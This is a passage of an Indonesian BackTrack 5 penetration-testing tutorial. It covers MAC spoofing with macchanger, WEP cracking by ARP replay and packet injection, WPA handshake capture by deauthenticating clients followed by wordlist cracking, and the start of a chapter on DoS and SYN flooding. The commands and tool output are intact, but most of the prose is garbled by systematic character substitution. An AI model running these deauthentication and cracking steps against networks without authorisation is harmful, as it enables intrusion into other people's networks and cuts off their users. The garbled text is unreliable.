Hasi% &ari 2eri#tah &i atas ter#"ata -e#$./ah a%a-at -ac a&&ress -e#ja&i !e#&,r
Ivianet technologiesJ
.. + A &i $.#aka# .#t.k -e#$./ah #i%ai !e#&,r -ac a&&ress secara acak
@ ra#&,- B
root@bt:~# macchanger -A eth0
Current MAC: 00:30:a6:62:ea:27 (Vianet Technologies, Ltd.)
Faked MAC: 00:04:4c:90:b8:e4 (Jenoptik)
&. +r ata. #rando5 a&a%ah ,2si "a#$ &i $.#aka# .#t.k -e#$./ah
kese%.r.ha# #i%ai -ac a&&ress secara acak @ ra#&,- B
root@bt:~# macchanger -r eth0
Current MAC: 00:04:4c:90:b8:e4 (Jenoptik)
Faked MAC: 6e:ed:5d:36:f5:83 (unknown)
A. %> %ist a&a%ah ,2si .#t.k -e%ihat &ata/ase !e#&,r "a#$ &i ketah.i ,%eh
-accha#$er
+,r-at Q
macchanger --list=keyword
root@bt:~# macchanger --list=Sony PCWA-C10
Misc MACs:
Num MAC Vendor
--- --- ------
0149 - 00:00:95 - Sony Tektronix Corp.
0330 - 00:01:4a - Sony Corporation
1056 - 00:04:1f - Sony Computer Entertainment, Inc.
2739 - 00:0a:d9 - Sony Ericsson Mobile Communications Ab
3553 - 00:0e:07 - Sony Ericsson Mobile Communications Ab
4024 - 00:0f:de - Sony Ericsson Mobile Communications Ab
7345 - 08:00:46 - Sony Corporation Ltd.
Wireless MACs:
Num MAC Vendor
--- --- ------
0039 - 08:00:46 - Sony PCWA-C10
B. - ata. E -ac a&a%ah ,2si .#t.k -e#$./ah -ac a&&ress ses.ai &e#$a#
+,r-at "a#$ kita i#$i#ka#
root@bt macchanger -m 00:0c:f1:00:0d:f3 eth0
Current MAC: 6e:ed:5d:36:f5:83 (unknown)
Faked MAC: 00:0c:f1:00:0d:f3 [wireless] (Intel Pro 2100)
4a&a ,2si c,#t,h &i atas sa"a -er./ah i#ter+ace &ari
[ Current MAC: 6e:ed:5d:36:f5:83 (unknown) ] saya menjadi
00:0c:f1:00:0d:f3 [wireless] (Intel Pro 2100)
*. 'A" TASK
Berik.t i#i /e/era2a c,#t,h 2e#etrati,# testi#$ .#t.k jari#$a# <ire%ess
*.$. !EP Penetration
=E4 a&a%ah sa%ah sat. je#is e#skri2si "a#$ saat i#i s.&ah jara#$ &i $.#aka# > #a-.#
-asih &a2at &i te-.i /e/era2a <ire%ess H,#e @ h,st2,t B "a#$ -e#$$.#aka# -et,&e
i#i. =E4 ata. I0ired eIuivalent privacyJ a&a%ah a%$,rit-a sec.rit" .#t.k
*EEE.9;'.11 <ire%ess #et<,rk &ise/.t j.$a &e#$a# Share& Ke" A.the#ticati,#.
Share& Ke" A.the#ticati,# a&a%ah -et,&a ,te#tikasi "a#$ -e-/.t.hka#
2e#$$.#aa# =E4. E#kri2si =E4 -e#$$.#aka# k.#ci "a#$ &i-as.kka# @,%eh
a&-i#istrat,rB ke c%ie#t -a.2.# access 2,i#t. K.#ci i#i har.s c,c,k &ari "a#$
&i/erika# akses 2,i#t ke c%ie#t> &e#$a# "a#$ &i-as.kka# c%ie#t .#t.k a.te#tikasi
-e#.j. access 2,i#t.
*.$.$. Proses S2ared Ke7 A4t2entication
$. C%ie#t -e-i#ta as,siasi ke access 2,i#t> %a#$kah i#i sa-a se2erti )2e#
S"ste- A.the#ticati,#. access 2,i#t -e#$iri-ka# te1t cha%%e#$e ke c%ie#t
secara tra#s2ara#. c%ie#t aka# -e-/erika# res2,# &e#$a# -e#$e#kri2si
te1t cha%%e#$e &e#$a# -e#$$.#aka# k.#ci =E4 &a# -e#$iri-ka#
ke-/a%i ke access 2,i#t.
%. Access 2,i#t -e-/eri res2,# atas ta#$$a2a# c%ie#t> akses 2,i#t aka#
-e%ak.ka# &ecr"2t terha&a2 res2,# e#kri2si &ari c%ie#t .#t.k -e%ak.ka#
!eri+ikasi /ah<a te1t cha%%e#$e &ie#kri2si &e#$a# -e#$$.#aka# =E4 ke"
"a#$ ses.ai. 4a&a 2r,ses i#i> access 2,i#t aka# -e#e#t.ka# a2akah c%ie#t
s.&ah -e-/erika# k.#ci =E4 "a#$ ses.ai. A2a/i%a k.#ci =E4 "a#$
&i/erika# ,%eh c%ie#t s.&ah /e#ar> -aka access 2,i#t aka# -eres2,#
2,siti+ &a# %a#$s.#$ -e#$a.the#tikasi c%ie#t. Na-.# /i%a k.#ci =E4
"a#$ &i-as.kka# c%ie#t sa%ah> access 2,i#t aka# -eres2,# #e$ati+ &a#
c%ie#t ti&ak aka# &i/eri a.the#tikasi. De#$a# &e-ikia#> c%ie#t ti&ak aka#
tera.the#tikasi &a# ti&ak teras,siasi.
=E4 a&a%ah sta#&art !eri+ikasi "a#$ ti&ak a-a# 2a&a %a/ task ka%i i#i sa"a aka#
-e-/i-/i#$ a#&a .#t.k -e%ak.ka# 2e#etrati,# testi#$ terha&a2 e#skri2si <2e.
*.$.%. Pentest !EP den1an c/ient
Kita aka# -e%ak.ka# 2erc,/aa# 2e#test <2e attack "a#$ -e-a#+aatka# a.the#+ikasi
2a%s. &a# 2e#$.-2.%a# serta 2e#a#$ka2a# tra#s-isi &ata &ari access2,i#t @ A4 B
4ersia2a# &a# s2esi+ikasi 2erc,/aa#
$. /ssi& A4 C8:64:C7:4B:B8:D0
%. e#skri2si Iwe6J
9. a.th IOPNJ
). /ssi& attacker Q I00:19:d2:45:4d:96J
T,,%st,,%s "a#$ &i$.#aka#
$. aircrack#$
%. air-,##$
9. air,&.-2#$
). aircrack#$
*. aire2%a"#$
La#$kah E %a#$kah terse/.t a#tara %ai# >
$. en1akti3kan E5ode 5onitorF di wire/ess inter3ace
La#$kah 2erta-a "a#$ har.s &i%ak.ka# a&a%ah -e#$akti+ka# -,&e -,#it,r 2a&a
i#ter+ace <ire%ess. Ha% i#i &a2at &i%ak.ka# &e#$a# 2eri#tah Iairmon-ng start
[ interface ] I -,&e -,#it,r ata. /iasa &i se/.t se/a$ai RFON @Ra&i,
8reU.e#c" M)Nit,rB -,&e> -e-.#$ki#ka# kita .#t.k -e#a#$ka2 se-.a tra++ik
&ari <ire%ess #et<,rk.
%. en14564/kan in3or5asi 4nt4k /an1ka2 berik4tn7a
Sete%ah -,&e -,#it,r /erhasi% &i%ak.ka# a&a /aik#"a kita -e#$.-2.%ka# se-.a
i#+,r-asi "a#$ &i /.t.hka# .#t.k %a#$kah /erik.t#"a. Ya#$ 2er%. kita k.-2.%ka#
a&a%ah Q
/ssi& A4 tar$et
cha##e% A4 tar$et
4=R @ jarak &e#$a# A4 B
Jarak &e#$a# A4 @ 4=R B sa#$at 2e#ti#$ -e#$i#$at /e/era2a i#jeksi 2a&a aire2%a"
seri#$ $a$a% aki/at ter%a%. &ekat ata. ja.h &ari A4. (#t.k -e#$.-2.%ka# i#+,r-asi
terse/.t kita $.#aka# air,&.-2 ata. -e-as.ka# 2eri#tah Ii0config scannJ (#t.k
c,#t,h ka%i i#i sa"a -e-akai airodump
r,,tS/tQWT air,&.-2#$ -,#;
BSSID PWR Beacons #Data, #/s CH MB ENC
CIPHER AUTH ESSID

00:1E:C1:4C:BF:F8 -36 172 358 20 11 54e. WPA
TKIP PSK ibteam-3g
C8:64:C7:4B:B8:D0 -48 172 0 0 10 11e WEP
WEP blaspemy

BSSID STATION PWR Rate Lost
Packets Probes

00:1E:C1:4C:BF:F8 00:19:D2:45:4D:96 0 54e-54e 0
347
Sete%ah -e#$.-2.%ka# i#+,r-asii#+,r-asi "a#$ &i/.t.hka# @ s.&ah sa"a se/.tka#
&i atas B -isa%#"a 2a&a kas.s i#i
Target AP
--------------
ESSID : blaspemy
BSSID : C8:64:C7:4B:B8:D0
Channel : 10
De#$a# /er/eka% &ata &i atas sa"a %a#j.tka# &e#$a# -e%ak.ka# 2e#a#$ka2a#
@ -,#it,ri#$ B 2aket &ata &a# tra+ik 2a&a <ire%ess #et<,rk
airodump-ng -c 10 -b C8:64:C7:4B:B8:D0 -w wepdump mon0
Di-a#a Q
c a&a%ah cha##e%
/ a&a%ah /ssi& @ /ssi& B
< Hasi% ,.t2.t &.-2 tra+ik &a# &ata
4erhatika# 2a&a A4 tar$et ter&a2at c%ie#t "a#$ se&a#$ terh./.#$ &e#$a# BSS*D
83QECQ09Q::Q6;Q80
9. In;ection test
La#$kah ke E 0 i#i ti&ak <aji/ ha#"a .#t.k -e-astika# /ah<a i#ter+ace <ire%ess
kita /isa &iajak kerja sa-a /.at i#jeksi
4erhatika# $a-/ar &i atas > katakata *#jecti,# is <,rki#$ a&a%ah ke2astia# /ah<a
i#ter+ace <ire%ess sia2 &i $.#aka#. Da# &e#$a# ,t,-atis aire2%a" aka# -e%ak.ka#
2r,/e ke A4 "a#$ &a2at &i&eteksi &a# -as.k 2a&a ra#$e sca##er.
). Fake A4t2entication
8ake a.the#ticati,# &e#$a# aire2%a" &a2at &i%ak.ka# 2a&a ' ti2e ,te#ti+ikasi =E4
@ ,2e# s"ste- &a# share&ke" B &a# seka%i$.s -e#$h./.#$ka# a#&a &e#$a#
access2,i#t. Je#is i#jeksi i#i ti&ak /er%ak. 2a&a e#skri2si <2a<2a'. B.ka c,#s,%e
ata. ter-i#a% /ar. ke-.&ia# -as.ka# 2eri#tah &i /a<ah i#i.
root@bt:~# aireplay-ng -1 0 -a C8:64:C7:4B:B8:D0 mon0

Ke-.&ia# 2erhatika# 2a&a ter-i#a% &i -a#a air,&.-2#$ se&a#$ -e%ak.ka#
IcapturingJ
A#&a aka# -e%ihat /ssi& a#&a -.#c.% se/a$ai i#+,r-asi c%ie#t 2a&a ,.t2.t ter-i#a%
2a&a Iair,&.-2J Me#a#&aka# a#&a s.&ah terh./.#$ &e#$a# A4.
*. ARP reT4est re6/a7
Aire2%a" -a-2. -e#ci2taka# i#itia%iHati,# !ect,rs @ *Vs B. Da%a- -,&e i#jeksi i#i >
aire2%a" aka# -e#&e#$arka# AR4 &a# -e#$iri-ka##"a ke-/a%i ke A4. Ketika A4
-e#$.%a#$ 2aket AR4 &e#$a# *Vs /ar. > aire2%a" aka# -e#tra#s-isika# ke-/a%i
2aket AR4 "a#$ sa-a /er.%a#$.%a#$ &a# A4 aka# -e#$iri- setia2 2aket AR4
&e#$a# *Vs "a#$ /ar.> "a#$ #a#ti#"a aka# &i /.t.hka# .#t.k -e#&a2atka#
e#skri2si =4E.
.. Dea4t2entication C/ient
Ti2e i#jeksi i#i -e#$iri-ka# 2aket &isass,cate ke sat. c%ie#t ata. %e/ih "a#$ se&a#$
terh./.#$ &e#$a# A4.
root@bt:~# aireplay-ng -o 1 -a C8:64:C7:4B:B8:D0 mon0
Di-a#a>
, a&a%ah je#is sera#$a# &ea.the#ticati,#
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
1 a&a%ah j.-%ah &ea.th "a#$ aka# &ikiri- > a#&a /isa -e#e#t.ka# j.-%ah %e/ih &ari
sat. ata. $.#aka# I,J .#t.k 2e#$iri-a# &ea.th "a#$ ter.s -e#er.s
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
a a&a%ah BSS*D A4 tar$et
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
-,#; a&a%ah i#ter+ace <ire%ess

Da# 2erhatika# /ah<a AR4 reU.est re2%a" /erja%a# sete%ah &ea.th &i%aksa#aka#
Ha% i#i aka# -e-/.at kita &a2at -e#$.-2.%ka# &ata "a#$ c.k.2 ,%eh 2r,$ra-
air,&.-2#$.
&. Aircrack+n1
Sete%ah &ata "a#$ kita k.-2.%ka# c.k.2 kita ti#$$a% -e-ai#ka# +i%e hasi% Ica2t.reJ
air,&.-2#$ "a#$ tersi-2a# &e#$a# #a-a "a#$ te%ah kita te#t.ka# 2a&a %a#$kah
ca2t.re tra+ik &ata &e#$a# air,&.-2 2a&a ter-i#a% se/e%.-#"a. 8i%e "a#$ &i si-2a#
aka# /erekste#si .ca2. 8i%e terse/.t se/e#ar tersi-2a# 2a&a &irekt,ri &i-a#a kita
-e-.%ai 2eri#tah IairodumpJ
Jika I(s "a#$ kita k.-2.%ka# s.&ah -e-a&ai kita /isa -e-as.ka# a#$ka 1 .#t.k
-e-.%ai cracki#$ 2ara-eter. Jika /e%.- /erhasi% @ +ai%e& B kita har.s -e#.#$$. >
Jika /erhasi% -aka aircrack aka# -e#a-2i%ka# ,.t2.t se2erti $a-/ar &i /a<ah.
).t2.t terse/.t aka# -e#a-2i%aka# ke" "a#$ /erhasi% &i crack &e#$a# #i%ai 2e<
serta #i%ai ASCII.
(#t.k -e%ak.ka# cracki#$ =E4 sa"a ha#"a -e-/.t.hka# 3 ter-i#a% saja
*.$.9. Pentest !EP tan6a c/ient
Ka%a. 2a&a 2erc,/aa# 2erta-a kita -e%ak.ka# 2e#test ke <e2 &e#$a# a&a#"a c%ie#t
"a#$ se&a#$ terk,#eksi > ka%i i#i kita aka# -e#c,/a -e%ak.ka# i#jeksi ta#2a a&a#"a
c%ie#t "a#$ terk,#eksi &i A4. Ha% &a2at &i-.#$ki#ka# -e#$i#$at 8akea.th -a-2.
-e-/.ka h./.#$a# &e#$a# A4 "a#$ &i !ariasika# &e#$a# AR4 reU.est re2%a"
ke-.&ia# -e#$hasi%ka# *Vs.
Baik s2esi+ikasi 2erc,/aa# -asih sa-a &e#$a# 4erc,/aa# sat. > ha#"a saja ka%i i#i
sa"a ti&ak -e#$k,#eksika# c%ie#t sa-a seka%i 2a&a =E4 @ e-2t" E c,##ecti,# B
Se2erti 2a&a 2erc,/aa# sat. > kita ca2t.re tra+ik &a# &ata A4 &e#$a# air,&.-2.
Ke-.&ia# -e#ja%a#ka# +akea.th aire2%a"#$.

Maka 2a&a air,&.-2#$ ,.t2.t aka# -e#a-2i%ka# sat.sat.#"a c%ie#t "a#$
terk,#eksi &e#$a# A4 > "ait. /ssi& sa"a sete%ah 8akea.th /erhasi% &i%a#carka# ta#2a
err,r.
Interacti=e Packet Re6/a7
Sera#$a# i#i -e-.#$ki#ka# A#&a .#t.k -e-i%ih 2aket terte#t. .#t.k Ire2%a"i#$J
@ i#jecti,# B. *#teracti!e 4acket Re2%a" -e-.#$ki#ka# kita .#t.k -e#$a-/i% 2aket .#t.k
re2%a" &ari &.a s.-/er. Ya#$ 2erta-a a&a%ah a%ira# %a#$s.#$ 2aket2aket &ari kart. #irka/e%
A#&a. Ya#$ ke&.a a&a%ah &ari +i%e 2ca2.
Sta#&ar 2ca2 +,r-at @ca2t.re 2aket> terkait &e#$a# %i/2ca2 %i/rar" htt2QAA<<<.tc2&.-2.,r$B>
&iak.i ,%eh Ber/a$ai t,,%s a#a%isa jari#$a# /aik /er/a"ar -a.2.# $ratisa# @ ,2e#s,.rce B.
(#t.k Ke/erhasi%a# sera#$a# i#i> sa#$at%ah 2e#ti#$ .#t.k -e#$erti %e/ih /a#"ak te#ta#$ a%ira#
2aket #irka/e%. Ti&ak se-.a 2aket &a2at &i Ica2t.reJ &a# &i re2%a"> Ha#"a 2a&a 2aket2aket
terte#t. saja. Dikataka# /erhasi%> ketika *#jeksi &iteri-a ,%eh A4 "a#$ -e#$hasi%ka# !ekt,r
i#isia%isasi /ar. @*VsB
4erhatika# c,#t,h 2e#$$.#aa# i#jeksi IInteractive -acket ReplayJ.
-2 adalah mode attack injeksi Interactive Packet Replay
===============================================================
-p 0841 dimana kita memodifikasi Frame Control Field sehingga
paket terlihat seperti dikirim dari client ke AP dengan normal
dan legal.
===============================================================
-c FF:FF:FF:FF:FF adalah dimana kita mengatur alamat mac
( desination Mac option/-c ) menjadi broadcast . Hal ini kita
butuhkan mengingat kita mengharapkan agar AP dapat mereply paket
yang akan menghasilkan IVs baru.
===============================================================
-b Adalah mac address AP
===============================================================
-h Adalah mac address kita
===============================================================
mon0 Adalah interface yang digunakan
Jika *#jeksi -e#a<arka# .#t.k -e#$$.#aka# 2aket hasi% +6 >A)$ -aka -as.ka#
I7J %a%. e#ter sehi#$$a *#jeksi aka# -e-.%ai 2e#$iri-a# 2aket reU.est.
Ketika /erhasi% -aka kita &a2at -e%ihat reU.est 2aket &ari i#jeksi 2a&a ta-2i%a#
,.t2.t Iair,&.-2#$J. Ter%ihat 2a&a k,%,- T&ata &a# TAs &i-a#a aliran data aka#
#a-2ak /erta-/ah &e#$a# deras.
La#$kah terakhir a&a%ah > -e#$$.#aka# aircrack .#t.k -e-.%ai cracki#$ +i%e
IYca6J "a#$ te%ah &i hasi%ka# ,%eh Iairodump6ngJ te#t. saja jika *Vs 2a&a air,&.-2
s.&ah c.k.2. *#$at *Vs terja&i ketika A4 -ere2%" ata. -eres2,#& hasi% *#jecti,#
I*#teracti!e 4acket Re2%a"J
*.%. !PAD!PA% Penetration
=4A @!i+Fi Protected AccessB a&a%ah s.at. siste- 4e#$a-a#a# "a#$ 2a%i#$
/a#"ak &i$.#aka# 2a&a akhir &asa<asa i#i. Met,&e 2e#$a-a#a# &e#$a# =4A i#i>
&ici2taka# .#t.k -e%e#$ka2i &ari siste- "a-$ se/e%.-#"a> "ait. =E4. 4ara 2e#e%iti
-e#e-.ka# /a#"ak ce%ah &a# ke%e-aha# 2a&a i#+rastr.kt.r #irka/e% "a#$
-e#$$.#aka# -et,&a 2e#$a-a#a# =E4. Se/a$ai 2e#$$a#ti &ari siste- =E4> =4A
-e#$i-2%e-e#tasika# %a"er &ari *EEE> "ait. %a"er 9;'.11i. Na#ti#"a =4A aka#
%e/ih /a#"ak &i$.#aka# 2a&a i-2%e-e#tasi kea-a#a# jari#$a# #irka/e%. =4A
&i&esai# &a# &i$.#aka# &e#$a# a%at ta-/aha# %ai##"a> "ait. se/.ah k,-2.ter
2ri/a&i @4CB.
8.#$si &ari k,-2.ter 2ri/a&i i#i ke-.&ia# &ike#a% &e#$a# isti%ah authentication
server> "a#$ -e-/erika# key "a#$ /er/e&a ke2a&a -asi#$E-asi#$ 2e#$$.#aAclient
&ari s.at. jari#$a# #irka/e% "a#$ -e#$$.#aka# akses 2,i#t se/a$ai -e&ia se#tra%
k,-.#ikasi. Se2erti &e#$a# jari#$a# =E4> -et,&a &ari =4A i#i j.$a -e#$$.#aka#
algoritma R+#
4e#$a-a#a# jari#$a# #irka/e% &e#$a# -et,&a =4A i#i> &a2at &ita#&ai &e#$a#
-i#i-a% a&a ti$a 2i%iha# "a#$ har.s &iisi a&-i#istrat,r jari#$a# a$ar jari#$a# &a2at
/er,2erasi 2a&a -,&e =4A i#i. Keti$a -e#. "a#$ har.s &iisi terse/.t a&a%ahQ
Ser!er
K,-2.ter ser!er "a#$ &it.j. ,%eh akses 2,i#t "a#$ aka#
-e-/eri ,t,#tikasi ke2a&a c%ie#t. /e/era2a 2era#$kat %.#ak
"a#$ /iasa &i$.#aka# a#tara %ai# +reeRAD*(S> ,2e#RAD*(S
&a# %ai#%ai#.
-ort
N,-,r 2,rt "a#$ &i$.#aka# a&a%ah 191'.
*hared *ecret
Share& Secret a&a%ah k.#ci "a#$ aka# &i/a$ika# ke k,-2.ter
&a# j.$a ke2a&a c%ie#t secara tra#s2ara#t.
Sete%ah k,-2.ter &ii#sta%% 2era#$kat %.#ak ,t,#tikasi se2erti +reeRAD*(S> -aka
serti+ikat "a#$ &ari ser!er aka# &i/a$ika# ke2a&a c%ie#t.
(#t.k -e#$$.#aka# Ra&i.s ser!er /isa j.$a &e#$a# ta#2a -e#$i#sta%% 2era#$kat
%.#ak &i sisi k,-2.ter c%ie#t. Cara "a#$ &i$.#aka# a&a%ah =e/ A.the#ticati,#
&i-a#a (ser aka# &iarahka# ke ha%a-a# L,$i# ter%e/ih &ah.%. se/e%.- /isa
-e#$$.#aka# Jari#$a# =ire%ess. Da# Ser!er "a#$ -e#a#$a#i a.te#tikasi a&a%ah
Ra&i.s ser!er. @ s.-/er Q id10ikipedia1org B
4ersia2a# &a# s2esi+ikasi 2erc,/aa#
/ssi& A4 00:1E:C1:4C:BF:F8
e#skri2si I!PAJ
a.th IPSKJ
chi22er ITKIPJ
/ssi& attacker Q 00:19:d2:45:4d:96
T,,%st,,%s "a#$ &i$.#aka#
$. aircrack#$
%. air-,##$
9. air,&.-2#$
). aircrack#$
*. aire2%a"#$
La#$kah E %a#$kah
en1akti3kan E5ode 5onitorF di wire/ess inter3ace
Se2erti 2a&a %a#$kah =E4 "a#$ te%ah kita /ahas se/e%.-#"a> La#$kah 2erta-a
"a#$ har.s &i%ak.ka# a&a%ah -e#$akti+ka# -,&e -,#it,r 2a&a i#ter+ace <ire%ess.
'an1ka2 berik4tn7a ada/a2 5en14564/kan in3or5asi 7an1 dib4t42kan
den1an Eairod456+n1F
*#+,r-asi "a#$ <aji/ kita k.-2.%ka# .#t.k %a#$kah /erik.t#"a a&a%ah
/ssi& @ -ac a&&ress A4 <2a tar$et B Q 00:1E:C1:4C:BF:F8
CH @ cha##e% A4 B Q 11
ESS*D Q i/tea-0$
Ke-.&ia# kita %a#j.tka# &e#$a# -e#$.-2.%ka# a%ira# &ata &ari A4> ke-/a%i %a$i
&e#$a# Iairodump6ngJ Ka%i i#i %e/ih s2esi+ik &e#$a# /ssi& tar$et A4 &a# ,2si
cha##e%
Den1an keteran1an C
c @ cha##e% A4 "a#$ &i $.#aka# B
/ @ /ssi& tar$et A4 B
< @ #a-a +i%e hasi% ca2t.ri#$ "a#$ aka# &isi-2a# &e#$a# ekste#si [ca6 B
-,#; @ i#ter+ace <ire%ess B
Hasi% 2eri#tah &i atas 2a&a $a-/ar ter%ihat a&a#"a c%ie#t &e#$a# /ssi&
F4:EC:38:99:60:F3 "a#$ te%ah -e%ak.ka# 2r,/e terha&a2 SS*D tar$et. A#&a
&a2at -e#e-.ka# i#+,r-asi c%ie#t "a#$ terk,#eksi &e#$a# /aik 2a&a A4 &i k,%,-
STAT*)N 2a&a ,.t2.t Iairodump6ngJ.
*.%.$. !PA Hands2ake
T.j.a# kita se/e#ar#"a a&a%ah terca2ai#"a <2aha#&shake. 4e#ti#$ a#&a ketah.i
a&a%ah -e#&a2atka# ke" <2a ti&ak%ah se-.&ah =E4 > kare#a ke" 2a&a <2a ti&ak%ah
statik se2erti 2a&a <e2. Kare#a it. ke-.#$ki#a# .#t.k -e#"era#$ =4A a&a%ah
&e#$a# teh#ik /r.te+,rci#$ &a# ha% it. &a2at terja&i jika a&a#"a i#+,r-asi
Iha#&shakeJ a#tara A4 &a# c%ie#t %e$a% /erhasi% &i ca2t.re ,%eh hasi% ,.t2.t [ca2
air,&.-2#$. (#t.k -e#&a2atka# ha#&shake kita har.s -e#&isk,#eka#
@ &ea.the#ticati,# B c%ie#t &ari A4 ter%e/ih &ah.%.. (#t.k it. kita $.#aka# aire2%a"
#$. 4er%. &icatat Q kare#a a%asa# k,#&isi &iatas> tar$et A4 har.s -e-i%iki c%ie#t %e$a%
ter%e/ih &ah.%.
Dea4t2entication c/ient
De#$a# s2esi+ikasi ,2si Q
&ea.th @ ; B ^ a&a%ah -,&e deauthentication
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
1 ^ j.-%ah aksi &ea.th @ a#&a /isa -e#$$.#aka# ; .#t.k -e%ak.ka# &ea.th secara
c,#ti#.e A ter.s -e#er.s B
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
a BSS*D A4 tar$et
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
c BSS*D c%ie#t 2a&a A4 tar$et
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
-,#; *#ter+ace <ire%ess
Sera#$a# &i atas -e-/.at c%ie#t ter2.t.s &ari A4 > &a# ketika c%ie#t -e%ak.ka#
k,#ekti!itas ke-/a%i &e#$a# A4 > Ha#&shake aka# ter%ihat 2a&a i#+,r-asi ,.t2.t
Iair,&.-2J
Para5eter crackin1 !PA
Cracki#$ =4A se2erti "a#$ te%ah &ise/.tka# &iatas> se/e#ar#"a ha#"a &a2at
&i%ak.ka# &e#$a# -et,&e /r.te+,rci#$ "a#$ -e-er%.ka# 2ass<,r& %ist ata. <,r&%ist
&icti,#ar". (#t.k -e#$.-2.%ka# <,r&%ist "a#$ -e#"era#$ tar$et terte#t. &a2at
&i%ak.ka# -et,&e s,ce#$> M*TM > &%%. (#t.k cracki#$ =4A /er&asarka# hasi%
2e#$.-2.%a# &ata &ari Iair,&.-2#$J "a#$ ter/e#t.k &e#$a# +i%e [ca2.
Ke/erhasi%a# i#i &ite#t.ka# %e#$ka2A/aik ata. ti&ak#"a <,r&%ist "a#$ &i$.#aka#.
/acktrack 5 -e#"e&iaka# ' t,,%s "a#$ -e-.#$ki#ka# a#&a -e%ak.ka# 2ara-eter
/r.te+,rce.
*.%.%. I56/e5entasi Aircrack+n1
syntax : aircrack-ng -w [ dir wordlist ] -b [ bssid target ]
[ file *cap ]
sehi#$$a 2a&a c,#t,h ka%i i#i sa"a -e-as.ka# 2eri#tah Q
root@bt:~# aircrack-ng -w
/pentest/password/wordlists/darkc0de.1st -b 00:1E:C1:4C:BF:F8
wpa2dump-01.cap
*.%.%. I56/e5entasi Cow6att7
(#t.k 2e#$$.#aa# c,<2att" s.&ah &i /ahas 2a&a -,&.%e se/e%.-#"a 2a&a s./
,++%i#e cracki#$ t,,%s.
"A" (III
STRESS TESTING
Oleh : zee eichel
$. STRESS TESTING
Stress Testin1 -er.2aka# s.at. .jic,/a 2e#etrasi terha&a2 kere#ta#a# sera#$a#
flood ata. dos &a# !ariasi#"a. Kere#ta#a# terse/.t /iasa#"a &a2at &ita#$$.%a#$i
&e#$a# 2e#$e%,%aa# fire0all &e#$a# /e#ar.
Ba#"ak teh#ik 3/oodin1 &a# &e#$a# /er/a$ai t.j.a#.
T.j.a# attacker &a%a- -e%ak.ka# sera#$a# dos A 3/oodin1 C
$. Me#$a%ihka# 2erhatia# &ari s"sa&-i# .#t.k -e%ak.ka# ti#&aka# hacki#$
%ai##"a
%. Me%ak.ka# 2e-.t.sa# k,#eksi &e#$a# -aks.& E -aks.& komersial
@ 2ersai#$a# /is#is B
9. Ti#&aka# .#t.k -e-as.ki k,-2.ter %ai# "a#$ terkait 2a&a sat. jari#$a#
&e#$a# ser!er tar$et ta#2a &a2at &i %acak ,%eh ser!er.
$.$. DoS Attack
Sera#$a# DoS @ denial6of6service attacksVB a&a%ah je#is sera#$a# terha&a2 se/.ah
k,-2.ter ata. ser!er &i &a%a- jari#$a# i#ter#et -a.2.# jari#$a# %,ka% &e#$a#
-,&.s -e#$ha/iska# s.-/er @resourceB "a#$ &i-i%iki ,%eh k,-2.ter terse/.t
sa-2ai k,-2.ter terse/.t ti&ak &a2at -e#ja%a#ka# +.#$si#"a &e#$a# /e#ar sehi#$$a
secara ti&ak %a#$s.#$ -e#ce$ah 2e#$$.#a %ai# .#t.k -e-2er,%eh akses %a"a#a#
&ari k,-2.ter "a#$ &isera#$ terse/.t.
4erhatika# $a-/ar &iatas > sa%ah sat. ske#ari, &,s a&a%ah -e%ak.ka# sera#$a# &ari
sat. titik ke titik "a#$ %ai#. Ka%i i#i c,#t,h#"a se,ra#$ attacker @ 168.12.25.5 B
-e%ak.ka# sera#$a# -e%a%.i i#ter#et @ 2./%ic #et<,rk B terha&a2 se/.ah 2er.sahaa#.
Da# &,s terse/.t %a#$s.#$ -e#.j. ke2a&a <e/ ser!er @ 132.12.25.1 B
$.%. DDoS Attack
Se/e#ar#"a DDo* attack sa-a k,#se2#"a &e#$a# Do* attack ha#"a saja ka%a. D,S
&i%ak.ka# ,%eh t.#$$a% attacker se&a#$ka# D&,S -er.2aka# sera#$a# &e#$a#
/a#"ak h,st. Attacker "a#$ -e%ak.ka# sera#$a# D&,S -e-akai /a#"ak k,-2.ter
"a#$ te%ah &ia k.asai se/e%.-#"a "a#$ &ise/.t se/a$ai IEombieJ. De#$a# a&a#"a
H,-/ieH,-/ie terse/.t> sera#$a# secara /ersa-asa-a &a# sere#tak 2.# &a2at &i
%ak.ka#.
$.9. S:N F/oodin1 Attack
S:N 3/oodin1 attack a&a%ah je#is sera#$a# Denial6of6service @ DOS B "a#$
-e#$$.#aka# 2aket2aket S:N.
A6a it4 6aket S:N Z
4aket2aket SYN a&a%ah sa%ah sat. je#is 2aket &a%a- protokol (ransmission +ontrol
-rotocol @ TCP B "a#$ &a2at &i$.#aka# .#t.k -e#ci2taka# k,#eksi a#tara &.a h,st
&a# &ikiri-ka# ,%eh h,st "a#$ he#&ak -e-/.at k,#eksi> se/a$ai %a#$kah 2erta-a
2e-/.ata# k,#eksi &a%a- 2r,ses N(+- (hree60ay ?andshakeN.
M,&.s sera#$a# SYN
Attacker aka# -e#$iri-ka# 2aket2aket S:N -e#.j. ke 2,rt2,rt "a#$ /era&a
&a%a- kea&aa# N,isteningN 2a&a h,st tar$et. Se/e#ar#"a 2aket2aket SYN "a#$
&ikiri-ka# har.s%ah /erisi a%a-at

s.-/er "a#$ -e#.#j.kka# siste- akt.a%> teta2i 2aket2aket SYN &a%a- sera#$a# i#i
&i&esai# se&e-ikia# r.2a> sehi#$$a 2aket2aket terse/.t -e-i%iki a%a-at
s.-/er "a#$ ti&ak -e#.#j.kka# siste- aktual.
Ketika tar$et -e#eri-a 2aket SYN "a#$ te%ah &i-,&i+ikasi terse/.t> tar$et aka#
-eres2,#s &e#$a# se/.ah 2aket *9>!A+$ "a#$ &it.j.ka# ke2a&a a%a-at "a#$
terca#t.- &i &a%a- SYN 4acket "a#$ ia teri-a @"a#$ /erarti siste- terse/.t ti&ak
